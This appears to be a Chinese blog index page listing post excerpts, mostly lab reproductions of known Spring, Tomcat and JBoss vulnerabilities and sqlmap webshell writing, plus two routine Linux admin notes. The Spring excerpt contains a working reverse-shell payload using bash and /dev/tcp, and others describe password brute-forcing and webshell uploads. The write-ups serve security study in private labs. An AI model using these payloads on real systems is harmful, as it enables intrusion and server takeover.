- 博客(7)
- 收藏
- 关注
RSS订阅原创 spring框架远程代码执行漏洞CVE-2017-4971复现
利用vulhub进行漏洞环境搭建靶机:centos 172.16.2.182 攻击机:kali 172.16.2.173浏览器访问172.16.2.182:8080点击左上角登录,用给出的账号进行登录点击确定时,burp进行抓包使用如下反弹shell的Payload:&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vul
2020-08-28 11:48:09
1869
原创 数据库渗透_笔记篇
数据库写入shell一.可利用sqlmap的–os-shell进行shell写入利用条件:存在注入点要有file_priv权限知道网站绝对路径对web目录有写权限复现过程1.在centos(ip:172.16.2.240)上搭建漏洞环境sqli-LABS2.因为写入需要file_priv权限,这里为了实验方便直接连上数据库进行查询,看到为空,说明对目录不做限制。file_priv权限查询如下:show global variables like '%secure%';如果为N
2020-08-07 11:12:08
1438
原创 Tomcat8 弱口令拿shell
Tomcat8 弱口令拿shell漏洞描述Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。tomcat默认管理页面 ip:8080/manager/html复现过程1.在centos(ip:172.16.2.129)上利用docker搭建漏洞环境,访问tomcat管理页面,此时提示我们输入账号和密码,可以用kali自带的msf工具对账户密码进行爆破;2.爆破出弱口令为tomcat/tomcat3.进入tomcat管理后台,上传webshell先将木马文
2020-07-29 16:23:28
700
原创 Apache Tomcat任意文件上传漏洞CVE-2017-12615
漏洞描述当存在漏洞的Tomcat 运行在 Windows 主机上,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 的webshell文件,JSP文件中的恶意代码将能被服务器执行,导致服务器上的数据泄露或获取服务器权限。影响范围Apache Tomcat 7.0.0 – 7.0.79复现过程1.环境搭建,在CenOs7靶机 ip 172.16.2.129 上利用doc
2020-07-28 16:25:24
649
原创 Jboss反序列化漏洞CVE-2017-12149复现
Jboss反序列化漏洞CVE-2017-12149复现漏洞描述互联网爆出JBOSSApplication Server反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞细节和验证代码已公开,近期被不法分子利用出现大规模攻击尝试的可能性较大。漏洞危害程度为高危(High)。漏洞原理JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费
2020-07-24 15:41:24
374
1
原创 在Linux下使用mail命令发送邮件
一、安装yum install mailx二、编辑配置文件vim /etc/mail.rc在配置文件中添加下列内容set [email protected] (你的163邮箱)set smtp=smtp.163.com (163邮箱默认就用这个)set [email protected] (与第一行的一致)set smtp-auth-pa...
2018-11-22 16:14:40
305
原创 Centos7安装zabbix
一、关闭SELinux和防火墙二、安装数据库yum -y install mariadb-server mariadb-devel配置数据库create database zabbix character set utf8 collate utf8_bin;grant all privileges on zabbix.* to ‘zabbix’@‘localhost’ identifie...
2018-11-21 17:42:37
89
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人